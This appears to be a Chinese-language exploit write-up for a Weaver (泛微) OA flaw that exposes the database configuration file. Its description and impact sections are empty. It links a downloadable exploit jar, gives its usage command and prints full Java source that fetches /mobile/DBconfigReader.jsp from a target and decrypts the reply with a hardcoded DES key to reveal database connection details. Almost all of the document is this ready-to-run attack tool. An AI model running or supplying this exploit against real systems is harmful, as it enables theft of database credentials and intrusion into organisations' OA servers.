泛微OA 数据库配置文件读取

一、漏洞简介

二、漏洞影响

三、复现过程

https://download.0-sec.org/Web安全/泛微OA/ecologyExp.jar-master.zip

使用方式:

jdk 1.8以上,没混淆可以直接看源码

使用方法:

java -jar ecologyExp.jar http://0-sec.org

源代码如下,编译好的在上方github链接里。

package com.test;

import org.apache.http.HttpEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.util.EntityUtils;

import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
import java.security.SecureRandom;

public class ReadDbConfig {
    private final static String DES = "DES";
    private final static String key = "1z2x3c4v5b6n";

    public static void main(String[] args) throws Exception {
        if(args[0]!=null&& args[0].length() !=0){
            String url = args[0]+"/mobile/DBconfigReader.jsp";
            System.out.println(ReadConfig(url));
        }else{
            System.err.print("use: java -jar ecologyExp  http://127.0.0.1");
        }
    }

    private static String ReadConfig(String url) throws Exception {
        CloseableHttpClient httpClient = HttpClientBuilder.create().build();
        HttpGet httpGet = new HttpGet(url);
        CloseableHttpResponse response = httpClient.execute(httpGet);
        HttpEntity responseEntity = response.getEntity();

        byte[] res1 = EntityUtils.toByteArray(responseEntity);

        byte[] data = subBytes(res1,10,res1.length-10);

        byte [] finaldata =decrypt(data,key.getBytes());

        return (new String(finaldata));
    }

    private static byte[] decrypt(byte[] data, byte[] key) throws Exception {

        SecureRandom sr = new SecureRandom();
        DESKeySpec dks = new DESKeySpec(key);
        SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES);
        SecretKey securekey = keyFactory.generateSecret(dks);
        Cipher cipher = Cipher.getInstance(DES);
        cipher.init(Cipher.DECRYPT_MODE, securekey, sr);

        return cipher.doFinal(data);
    }

    public static byte[] subBytes(byte[] src, int begin, int count) {
        byte[] bs = new byte[count];
        System.arraycopy(src, begin, bs, 0, count);
        return bs;
    }

}